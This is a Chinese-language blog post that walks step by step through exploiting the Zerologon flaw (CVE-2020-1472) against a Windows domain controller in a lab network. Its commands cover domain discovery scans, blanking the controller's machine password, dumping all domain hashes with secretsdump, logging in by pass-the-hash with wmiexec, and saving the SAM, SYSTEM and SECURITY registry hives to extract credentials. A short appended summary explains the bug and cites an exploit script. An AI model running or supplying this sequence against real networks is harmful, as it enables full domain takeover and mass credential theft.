内网定位+CVE-2020-1472-利用过程

web安全学习了解:web渗透测试

官网:宣紫科技

域控(Win2008):192.168.199.131
域用户(Win7):192.168.199.128
域用户(Win03):192.168.199.129
漏洞验证工具:https://github.com/SecuraBV/CVE-2020-1472
利用+重置工具:https://github.com/risksense/zerologon
重置 hexpass 工具:https://github.com/dirkjanm/CVE-2020-1472
工具运行环境:https://github.com/SecureAuthCorp/impacket
1、假设已经通过 frp 代理到内网

 

2、判断域方法
(1)可以通过扫描是否开放端口:53(dns)、389(ldap)、445(rdp), 满足这几个条件,就可以判断是个域,可以尝试验证漏洞是否存在,因为内网修
这个洞的非常少,没人关注
(2)通过 nbtstat 命令
Usage:nbtstat -A 当前 IP

 

Usage:ping 域.com

 

(3)查看 systeminfo
Usage:systeminfo

 

(4)查看主机 dns
Usage:nslookup

 

(5)查看当前登录域
Usage:net config workstation

 

3、用拉登的 cs 插件扫 ldap
Usage:Ladon.exe 域地址 LdapScan
Example:Ladon.exe 192.168.199.1/24 LdapScan
(图中 IS_LDAP 表示确定 192.168.199.131 是域控)

 

3、确定域后用拉登确定域主机名
Usage:Ladon.exe 域地址 OsScan
Example:Ladon.exe 192.168.199.131 OsScan
HKServer.com\YUKONG(HKServer 是,YUKONG 是域主机名)

 

4、用验证脚本测试是否存在(测试存在) Usage:python3 zerologon_tester.py 域主机名 域地址
Example:python3 zerologon_tester.py YUKONG 192.168.199.131

 


5、再用 set_empty_pw 脚本测试
Usage: set_empty_pw.py <dc-name> <dc-ip>
Example:python3 set_empty_pw.py YUKONG 192.168.199.131
大概利用方法就是把域用户密码清空,用空密码连上去 dump 管理员的 hash

 

6、利用 secretsdump 脚本 dump 用户 hash
Usage:python3 secretsdump.py "域/主机名$"@域地址 -just-dc -no-pass
Example:
python3
secretsdump.py
"HKServer/YUKONG$"@192.168.199.131
-just-dc -no-pass
执行 dump 可以看到 YUKONG$用户的密码已经被重置成空密码,31d6cfe......

 

因为把域密码重置为空,所以-no-pass 就行了,在用户过多的情况下可以单独
dump administrator 的 hash
命令改成:-just-dc-user "administrator" 就 ok,见下图

 

7、利用 wmiexec 脚本横向连接(连接后恢复原始 hash)
Usage:
python3
wmiexec.py
域 /administrator@ 域 地 址
-hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5
Example:
python3 wmiexec.py HKServer/administrator@192.168.199.131 -hashes
aad3b435b51404eeaad3b435b51404ee:3766c17d09689c438a072a3327
0cb6f5

 

已经连上来了,可以上 cs,或者加管理员登录上去看都行,主要是恢复密码
先备份注册表(依次命令一遍):
reg save HKLM\SYSTEM system.save reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
(save 后缀的文件会下载到你 wmiexec 脚本的同目录)

 

8、再用 secretsdump 脚本获取原始 hash
直接退出来命令:
python3 secretsdump.py -sam sam.save -system system.save -security
security.save LOCAL

 

9、最后用 reinstall_original_pw 脚本恢复
Usage:python3 reinstall_original_pw.py
主机名 域地址
hash
Example:
python3
reinstall_original_pw.py
YUKONG
192.168.199.131
30f90a3bfe2f085a880dcf954a8825f4
10、可能会出现没有 hash 的情况,可以用 restorepassword 脚本恢复 hexpass
取第 8 步中 plan_password_hex 字段
Usage:python3 restorepassword.py DC@DC -target-ip 域地址 -hexpass

Example : python3
restorepassword.py YUKONG@YUKONG -target-ip
192.168.199.131
-hexpass
8dac4a096eec66839507b9018ace3e1ac2e27e4e81455eda7ee9e49d86a
2c57619740204e76571e512144a72c67d01e21a7d6b0c13ed4cebc97442
e1f9e75b6943c8fe4a67c0c8c6dfd0046624dd174b2dba468df3303a54a4
1be3f415f19f7cf25ae6f730cda6d125e5ebf480161b3bd9d4da2dca2f215f
01ba6b26603b8e36fd3bd86c3cb9ebba159da747df883125e6d00cbe105
c270c866d904b166bf6356f45572df5ed37976561da201e954074484b2d
b4462ae6c3d35fc0350feab07ea8868952fd8e84d9d5b66df6542e0f41a1e
283bb09c6cebfb2bb41fdc2b4d0a1ef8f5b2a94b2c3741c79f05c4edca170
11、用第 7 步看看是不是真的恢复了

 

恢复了,然后这时候假装已经通过 curl 之类的命令上了 cs,或者已经得到明文
密码,就算打下了
 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值